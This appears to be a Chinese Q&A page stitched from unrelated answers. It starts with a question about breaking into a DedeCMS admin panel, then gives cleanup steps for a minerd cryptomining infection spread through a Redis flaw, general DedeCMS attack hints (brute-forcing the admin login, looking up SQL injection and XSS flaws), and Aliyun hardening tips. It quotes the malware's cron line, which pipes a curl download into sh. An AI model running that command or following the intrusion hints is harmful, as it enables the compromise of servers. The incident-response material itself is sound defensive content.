dedecms 的后台怎么爆啊,能告诉我详细一点吗
1 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP
2 chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3 pkill minerd ,杀掉进程
4 service stop crond 或者 crontab -r 删除所有的执行计划
5 执行top,查看了一会,没有再发现minerd 进程了。
6检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blogjobbolecom/94518/然后就注入了病毒,下面是解决办法和清除工作:
1 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2 打开 ~/ssh/authorized_keys, 删除你不认识的账号
3 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉
实际任何程序都有漏洞 只不过用织梦的人比较多 windows系统每天还那么多漏洞恩!
你百度一下“织梦DedeCMS实用技巧-八大安全措施”这篇文章介绍如果防止黑客攻击织梦系统,青龙建站教程自学网建议你网站装上百度云加速, 这样能够更有效的防止黑客攻击!
第一,路径寻找很困难,dede虽然漏洞百出,但是后台地址可以任意改这一点很霸道,你基本没法通过猜以外的手法得知。
当然,如果你已经知道,那就可以使用暴力破解软件,但是必须支持DEDE的验证码OCR。
第二,要黑DEDE,要从会员系统入手。如果你了解基本的SQL注入和跨站脚本攻击等手法,可以去专门公布漏洞的网站找一下版本漏洞。毕竟dede的在线升级不是那么的好使,很多人不会升级到最新版,特别是那些从后台把版权隐藏的人。
防止阿里云服务器不被攻击:
首先系统内部安全要做好,系统漏洞补丁要打好,防火墙的策略、开放那些端口访问,允许那些IP访问,这些基本的设置要做好。
使用一些专业的安全漏洞扫描工具,阿里云自己有一个安全分析工具叫态势感知,利用工具可以分析发现潜在的入侵和高隐蔽性攻击威胁。
使用一些管理工具管理阿里云主机,可以很方便的管理阿里云主机,可以设置管理成员的权限,防止管理混乱,减少对外端口开放,还附带安全漏洞检查。
遭遇到DDoS攻击,需要购买第三方防DDoS攻击的服务,阿里云市场里面有云盾DDoS、东软、服务器安全加固及优化等一些防攻击的产品。
0条评论